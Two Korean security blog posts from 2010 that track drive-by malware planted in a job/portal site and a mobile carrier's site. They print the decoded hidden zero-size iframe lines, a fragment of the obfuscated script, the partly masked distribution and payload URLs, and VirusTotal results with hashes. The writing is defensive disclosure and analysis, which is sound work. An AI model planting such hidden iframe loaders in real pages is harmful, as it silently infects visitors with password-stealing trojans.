posted by Kwan's 2010. 10. 1. 22:18

어제 게시물 : [악성코드 유포] 알라딘 너희만 유포하냐?? 취업 , 포털 사이트인 우리도 질 수 없다.

전 게시물에 이어서 오늘도 역시 유포가 계속되고 있습니다. 오늘 아침에는 링크가 지워진것을 보았으니 또다시 링크를 삽입하여서 유포중에 있습니다. 빠른 조치가 될 줄 알았지만 지금도 역시 사이트에 접속하면 링크안에 또 다시 악성코드가 자리를 잡고 있음을 확인하였습니다.
왠지 계속 뚫리는거 보니 확인하는게 그때 그때만 하는게 아닌지 생각이 드네요...어제에 쓴 글과 같이 오늘도 역시 실망을 시키지 않는 취업 , 포털사이트 빨리 수정이 되었으면 하네요 . 현재 js 파일 안에는 또 다른 js로 연결되는 아이프레임이 삽입 되어 있습니다.

현재 포털 JS 안에는 아이프레임 형식이아닌 꼬여놓아서 코드를 만들어 놓았습니다

[생략](생략){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){중략};while(c--){if(k[c]){중략}('중략');',[중략]'.split('|'),0,{})) 이런식으로 되어 있습니다.

출력 시키면 : document.write("<iframe src=http://221.xxx.48.xxx/js/si.asp width=0 height=0></iframe>"); 이렇게 나옵니다~

다시 이런것을 출력 한다면 또다시 http://221.xxx.48.xxx/js/si.js 에 접근하게 됩니다. 이역시 위에 코드와 같이 꼬아놓았습니다. 그것을 다시 풀면 비로소 최종 파일에 연결되는 http://221.xxx.48.xxx/js/si.asp 에 접근이 됩니다. 그것을 토대로 최종파일 http://www.roxxxxxx.com/xxxx/help/box.exe 이쪽까지 연결되고 있습니다.
현재 js , asp , 최종파일을 살아있으며 사이트에 접근 하실때 감염이 되어있을수 있음을 알려드립니다 ...최종파일 box.exe 에 사용되었던 링크는 예전에도 많이 최종파일의 유포지였는데 조금 잠잠한가 싶더니만 또 다시 유포경로로 사용되고 있네요... time.asp 시절부터 줄 곧 최종파일로 들어가 있더니 오늘은 다른쪽에서 넣어져있네요..

마지막으로 어제와 달리 오늘은 주소, 최종파일 위치만 바뀌었을뿐 써먹은 기법은 비슷합니다. 

[안철수연구소 진단사항]

si.js ~> V3 : JS/Downloader(추가 : 2010.10.01.00)
si.asp ~> V3 : HTML/Exploit-cve(추가 : 2010.08.16.00)
최종파일 : box.exe ~> 악성 

[바이러스 토탈]

File name:

si.js

Result:

10/ 43 (23.3%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 JS/Downloader
AntiVir 7.10.12.96 2010.10.01 -
Antiy-AVL 2.0.3.7 2010.10.01 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.10.01 HTML:IFrame-JK
Avast5 5.0.594.0 2010.10.01 HTML:IFrame-JK
AVG 9.0.0.851 2010.10.01 -
BitDefender 7.2 2010.10.01 -
CAT-QuickHeal 11.00 2010.10.01 -
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6254 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 -
Emsisoft 5.0.0.50 2010.10.01 -
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7887 2010.10.01 -
F-Prot 4.6.2.117 2010.09.30 -
F-Secure 9.0.15370.0 2010.10.01 -
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 HTML:IFrame-JK
Ikarus T3.1.1.90.0 2010.10.01 -
Jiangmin 13.0.900 2010.09.30 -
K7AntiVirus 9.63.2648 2010.09.30 -
Kaspersky 7.0.0.125 2010.10.01 -
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.10.01 Heuristic.LooksLike.JS.Suspicious.B
Microsoft 1.6201 2010.10.01 -
NOD32 5495 2010.10.01 -
Norman 6.06.07 2010.10.01 -
nProtect 2010-10-01.02 2010.10.01 Script/W32.Agent.KE
Panda 10.0.2.7 2010.10.01 -
PCTools 7.0.3.5 2010.10.01 Downloader.Generic
Prevx 3.0 2010.10.01 -
Rising 22.67.02.07 2010.09.30 -
Sophos 4.58.0 2010.10.01 Mal/Iframe-Gen
Sunbelt 6954 2010.10.01 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.10.01 Downloader
TheHacker 6.7.0.1.041 2010.10.01 -
TrendMicro 9.120.0.1004 2010.10.01 -
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 -
VBA32 3.12.14.1 2010.10.01 -
ViRobot 2010.8.31.4017 2010.10.01 JS.S.Exploit.424
VirusBuster 12.66.9.0 2010.10.01 -
MD5: 82360d68e71cf37ae4400295f1746f08
SHA1: f67661ca29e253fde9bfda1ab5e0f54a0ddbf9dc
SHA256: 0536c42b0bbcbc8a4db28fe2f0931eee93bda5b1c8586682293e1a8664fc61de
File size: 424 bytes
Scan date: 2010-10-01 12:37:05 (UTC)

File name:

si.asp

Result:

19/ 43 (44.2%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 HTML/Exploit-cve
AntiVir 7.10.12.96 2010.10.01 JS/Agent.AV.2
Antiy-AVL 2.0.3.7 2010.10.01 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.10.01 JS:Downloader-RN
Avast5 5.0.594.0 2010.10.01 JS:Downloader-RN
AVG 9.0.0.851 2010.10.01 Script/Exploit
BitDefender 7.2 2010.10.01 -
CAT-QuickHeal 11.00 2010.10.01 -
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6254 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 Exploit.CVE2010.806
Emsisoft 5.0.0.50 2010.10.01 Exploit.JS.CVE-2010-0806!IK
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7887 2010.10.01 -
F-Prot 4.6.2.117 2010.09.30 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.10.01 -
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 JS:Downloader-RN
Ikarus T3.1.1.90.0 2010.10.01 Exploit.JS.CVE-2010-0806
Jiangmin 13.0.900 2010.09.30 -
K7AntiVirus 9.63.2648 2010.09.30 Riskware
Kaspersky 7.0.0.125 2010.10.01 Exploit.JS.CVE-2010-0806.z
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.10.01 Heuristic.BehavesLike.JS.BufferOverflow.A
Microsoft 1.6201 2010.10.01 -
NOD32 5495 2010.10.01 -
Norman 6.06.07 2010.10.01 -
nProtect 2010-10-01.02 2010.10.01 Script-JS/W32.Agent.ADF
Panda 10.0.2.7 2010.10.01 -
PCTools 7.0.3.5 2010.10.01 Trojan.Malscript
Prevx 3.0 2010.10.01 -
Rising 22.67.02.07 2010.09.30 Trojan.DL.Script.JS.Agent.qx
Sophos 4.58.0 2010.10.01 Mal/JSBO-Gen
Sunbelt 6954 2010.10.01 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.10.01 Trojan.Malscript!html
TheHacker 6.7.0.1.041 2010.10.01 -
TrendMicro 9.120.0.1004 2010.10.01 -
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 -
VBA32 3.12.14.1 2010.10.01 -
ViRobot 2010.8.31.4017 2010.10.01 JS.S.EX-CVE-2010-0806.6014
VirusBuster 12.66.9.0 2010.10.01 -
MD5: 8c3559a49e01ca01f37f30bb2becb843
SHA1: f5fe8f1f3879eadaefe1e5634caf1edd14c16394
SHA256: 6aa0644aac956e3c29c2de74ffcea74f560409a8eccc6ad5d5ee281631d18581
File size: 6014 bytes
Scan date: 2010-10-01 12:35:51 (UTC)

File name:

box.exe

Result:

16/ 43 (37.2%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 Trojan/Win32.OnlineGameHack
AntiVir 7.10.12.96 2010.10.01 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.10.01 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.10.01 -
Avast5 5.0.594.0 2010.10.01 -
AVG 9.0.0.851 2010.10.01 -
BitDefender 7.2 2010.10.01 Gen:Trojan.Heur.Zbot.dmW@cukxNad
CAT-QuickHeal 11.00 2010.10.01 (Suspicious) - DNAScan
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6254 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 -
Emsisoft 5.0.0.50 2010.10.01 Trojan.Win32.Pincav!IK
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7887 2010.10.01 -
F-Prot 4.6.2.117 2010.09.30 -
F-Secure 9.0.15370.0 2010.10.01 Gen:Trojan.Heur.Zbot.dmW@cukxNad
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 Gen:Trojan.Heur.Zbot.dmW@cukxNad
Ikarus T3.1.1.90.0 2010.10.01 Trojan.Win32.Pincav
Jiangmin 13.0.900 2010.09.30 Trojan/Invader.add
K7AntiVirus 9.63.2648 2010.09.30 -
Kaspersky 7.0.0.125 2010.10.01 -
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.10.01 -
Microsoft 1.6201 2010.10.01 -
NOD32 5495 2010.10.01 a variant of Win32/PSW.Gamania.NBT
Norman 6.06.07 2010.10.01 -
nProtect 2010-10-01.02 2010.10.01 -
Panda 10.0.2.7 2010.10.01 Suspicious file
PCTools 7.0.3.5 2010.10.01 -
Prevx 3.0 2010.10.01 High Risk Cloaked Malware
Rising 22.67.02.07 2010.09.30 -
Sophos 4.58.0 2010.10.01 Mal/Dorf-F
Sunbelt 6954 2010.10.01 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.10.01 -
TheHacker 6.7.0.1.041 2010.10.01 -
TrendMicro 9.120.0.1004 2010.10.01 TROJ_PINCAV.SMXA
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 TROJ_PINCAV.SMXA
VBA32 3.12.14.1 2010.10.01 Malware-Cryptor.Inject.gen
ViRobot 2010.8.31.4017 2010.10.01 -
VirusBuster 12.66.9.0 2010.10.01 -

MD5: 890f91924b1bd1ddc739c2a76cda20d7
SHA1: a11f4048cc73f38b3eed1f2f0f97161ba9d548dd
SHA256: e8f0b94fd3cb4d0772766c8a31021d505991d96fab11f17c2f73c53a21fd28d2
File size: 54272 bytes
Scan date: 2010-10-01 12:37:55 (UTC)

File name:

test.html

Result:

6/ 43 (14.0%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 -
AntiVir 7.10.12.96 2010.10.01 -
Antiy-AVL 2.0.3.7 2010.10.01 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.10.01 HTML:IFrame-JK
Avast5 5.0.594.0 2010.10.01 HTML:IFrame-JK
AVG 9.0.0.851 2010.10.01 -
BitDefender 7.2 2010.10.01 -
CAT-QuickHeal 11.00 2010.10.01 -
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6254 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 -
Emsisoft 5.0.0.50 2010.10.01 -
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7887 2010.10.01 -
F-Prot 4.6.2.117 2010.09.30 -
F-Secure 9.0.15370.0 2010.10.01 -
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 HTML:IFrame-JK
Ikarus T3.1.1.90.0 2010.10.01 -
Jiangmin 13.0.900 2010.09.30 -
K7AntiVirus 9.63.2648 2010.09.30 -
Kaspersky 7.0.0.125 2010.10.01 -
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.10.01 Heuristic.LooksLike.JS.Suspicious.B
Microsoft 1.6201 2010.10.01 -
NOD32 5495 2010.10.01 -
Norman 6.06.07 2010.10.01 -
nProtect 2010-10-01.02 2010.10.01 -
Panda 10.0.2.7 2010.10.01 -
PCTools 7.0.3.5 2010.10.01 Downloader.Generic
Prevx 3.0 2010.10.01 -
Rising 22.67.02.07 2010.09.30 -
Sophos 4.58.0 2010.10.01 -
Sunbelt 6954 2010.10.01 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.10.01 Downloader
TheHacker 6.7.0.1.041 2010.10.01 -
TrendMicro 9.120.0.1004 2010.10.01 -
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 -
VBA32 3.12.14.1 2010.10.01 -
ViRobot 2010.8.31.4017 2010.10.01 -
VirusBuster 12.66.9.0 2010.10.01 -
MD5: cf3e589dd00e28a178ead8d8d8ebc5d2
SHA1: e690c7a6395058e7c3a785c470fce0ae2906e9a6
SHA256: 1328284a3d90a852b641ed1fe85ade7251837445b8acf2ae713f0cac224375d9
File size: 442 bytes
Scan date: 2010-10-01 12:45:33 (UTC)

참고로 test.html 은 js 출력시키는 방법을 전수해주신 쭌님에게 감사함을 전해 드립니다 ~

신고 예정 업체 : 네이버 , 이스트 소프트 , 잉카 인터넷 , 퓨쳐 시스템 !! 입니다 !!

끝까지 읽어주셔서 감사하고 앞으로도 많은 관심 부탁드립니다~

댓글을 달아 주세요

  1. 2010.10.02 08:28  Addr  Edit/Del  Reply

    비밀댓글입니다

  2. du hoc han quoc 2012.01.19 17:12  Addr  Edit/Del  Reply

    고마워요, 좋은 하루 소원

posted by Kwan's 2010. 7. 9. 14:34
지금 현재 모 휴대폰 통신사 큐x텔에는 악성 아이프레임이 삽입되어서 연결하고 있는것으로 보인다,.
사이트 내 소스를 보면 금방 악성코드가 삽입되어 있는것을 볼 수가 있다 !!
</script>
</head>
<iframe height=0 width=0 Src= http://110.xx.139.2x1/css/Lib.asp </iframe>
<body style="margin:0" bgcolor="#ffffff">
<script language="JavaScript">flash('/inc/flash/main.swf','936','232','1');</script>

몇주동안 잠잠 하더니 자시 한번 악성코드에 감염된거 같다. 2주만에 다시 그러니 관리자가 뭐하고 있는지. 그래도 스크립트는 오래된것이 아니라 그런지 대부분의 업체에서 전부 진단을 함으로 신고 할 필요가 없을듯 싶다. 최종파일 위치까지 예전이랑 똑같아서 이제는 그럴려니 하고 넘어간다. 그래도 통신사인데 휴대폰 업데이트나 , 정보를 찾아가는 사람들이 백신이 없다면 감염되기 쉽상일꺼 같다. 빨리 관리자 분이 보셔서 삭제하길 희망한다. !!

감염 사이트 : http://www.cuxxtel.com
악성유포지 :  http://110.xx.139.2x1/css/Lib.asp
최종파일 : http://61.1xx.x.93/css/isa.exe

[바이러스 토탈 결과]

검사 파일: lib.asp 전송 시각: 2010.07.09 05:04:15 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.09 Virus.JS.Downloader.QJ!IK
AhnLab-V3 2010.07.09.00 2010.07.08 JS/Downloader
AntiVir 8.2.4.10 2010.07.08 JS/Drop.A.5851
Antiy-AVL 2.0.3.7 2010.07.08 -
Authentium 5.2.0.5 2010.07.09 -
Avast 4.8.1351.0 2010.07.08 JS:Downloader-QJ
Avast5 5.0.332.0 2010.07.08 JS:Downloader-QJ
AVG 9.0.0.836 2010.07.08 Script/Exploit
BitDefender 7.2 2010.07.09 Trojan.Script.407264
CAT-QuickHeal 11.00 2010.07.09 -
ClamAV 0.96.0.3-git 2010.07.08 -
Comodo 5368 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.09 -
eSafe 7.0.17.0 2010.07.08 -
eTrust-Vet 36.1.7693 2010.07.08 -
F-Prot 4.6.1.107 2010.07.08 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.07.09 Trojan.Script.407264
Fortinet 4.1.133.0 2010.07.08 -
GData 21 2010.07.09 Trojan.Script.407264
Ikarus T3.1.1.84.0 2010.07.09 Virus.JS.Downloader.QJ
Jiangmin 13.0.900 2010.07.08 -
Kaspersky 7.0.0.125 2010.07.09 Trojan-Downloader.JS.Agent.fhk
McAfee 5.400.0.1158 2010.07.09 -
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5902 2010.07.08 -
NOD32 5263 2010.07.08 probably a variant of JS/TrojanDownloader.Agent
Norman 6.05.11 2010.07.08 -
nProtect 2010-07-08.01 2010.07.08 Script-JS/W32.Agent.WH
Panda 10.0.2.7 2010.07.08 -
PCTools 7.0.3.5 2010.07.09 -
Prevx 3.0 2010.07.09 -
Rising 22.55.04.01 2010.07.09 Trojan.DL.Script.JS.Agent.qx
Sophos 4.54.0 2010.07.09 JS/Agent-MZX
Sunbelt 6562 2010.07.09 -
Symantec 20101.1.0.89 2010.07.09 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.09 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.09 -
VBA32 3.12.12.6 2010.07.08 -
ViRobot 2010.6.29.3912 2010.07.09 JS.S.Agent.5851
VirusBuster 5.0.27.0 2010.07.08 -
 
추가 정보
File size: 5851 bytes
MD5...: 51e7b5fe2fa7ef45de3b3671ba91b011
SHA1..: e6e7dd63b6de5b8b24c5a91d001d23a01de8186b
SHA256: 1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9
검사 파일: isa.exe 전송 시각: 2010.07.09 05:04:22 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.09 Trojan.Peed!IK
AhnLab-V3 2010.07.09.00 2010.07.08 Win-Trojan/Onlinegamehack.55296.G
AntiVir 8.2.4.10 2010.07.08 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.07.08 -
Authentium 5.2.0.5 2010.07.09 -
Avast 4.8.1351.0 2010.07.08 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.08 Win32:Malware-gen
AVG 9.0.0.836 2010.07.08 PSW.Generic8.DOZ
BitDefender 7.2 2010.07.09 Trojan.Generic.KD.18284
CAT-QuickHeal 11.00 2010.07.09 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.07.08 Trojan.Agent-164869
Comodo 5368 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.09 -
eSafe 7.0.17.0 2010.07.08 Win32.TRCrypt.ZPACK
eTrust-Vet 36.1.7693 2010.07.08 -
F-Prot 4.6.1.107 2010.07.08 -
F-Secure 9.0.15370.0 2010.07.09 Trojan.Generic.KD.18284
Fortinet 4.1.133.0 2010.07.08 -
GData 21 2010.07.09 Trojan.Generic.KD.18284
Ikarus T3.1.1.84.0 2010.07.09 Trojan.Peed
Jiangmin 13.0.900 2010.07.08 Trojan/PSW.Magania.anlt
Kaspersky 7.0.0.125 2010.07.09 -
McAfee 5.400.0.1158 2010.07.09 PWS-Mmorpg!pq
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.LooksLike.Trojan.Crypt.ZPACK.B
Microsoft 1.5902 2010.07.08 PWS:Win32/Magania.gen
NOD32 5263 2010.07.08 -
Norman 6.05.11 2010.07.08 W32/Suspicious_Gen2.BHOYR
nProtect 2010-07-08.01 2010.07.08 Trojan/W32.Agent.55296.IL
Panda 10.0.2.7 2010.07.08 Trj/CI.A
PCTools 7.0.3.5 2010.07.09 -
Prevx 3.0 2010.07.09 High Risk Cloaked Malware
Rising 22.55.04.01 2010.07.09 Trojan.Win32.Generic.521B263B
Sophos 4.54.0 2010.07.09 Sus/UnkPack-C
Sunbelt 6562 2010.07.09 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.07.09 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.09 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.07.09 -
VBA32 3.12.12.6 2010.07.08 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.6.29.3912 2010.07.09 Trojan.Win32.PSWMagania.55296.K
VirusBuster 5.0.27.0 2010.07.08 -
 
추가 정보
File size: 55296 bytes
MD5...: a4bd25915a827fe01c44926cc44273fe
SHA1..: 0748e6f3d2a27a5b852737bd40a86d9dcdce06c3
SHA256: d030b52bafbe52bb6e2527e94a325b1e3c996e17eab2789c601179bdb5e9c9ea


[이전글]

[security/악성코드 유포] - http://cpm2.XX66.org:88/Xo/Xi05.htm : JS:CVE-2010-0806-AK
[security/악성코드 유포] - http://gft54577.3xx2.org:6677/x/index.html 변조!!

댓글을 달아 주세요

  1. hoo 2010.07.09 16:41  Addr  Edit/Del  Reply

    줄기차게 나오네요..
    잘보고 갑니다~

    • Kwan's 2010.07.10 17:30 신고  Addr  Edit/Del

      Lib.asp 는 항상 똑같은곳에서 유포하는데 아직까지도 삭제되지않는거 보니 관리자가 손을 놓고 있나봐요~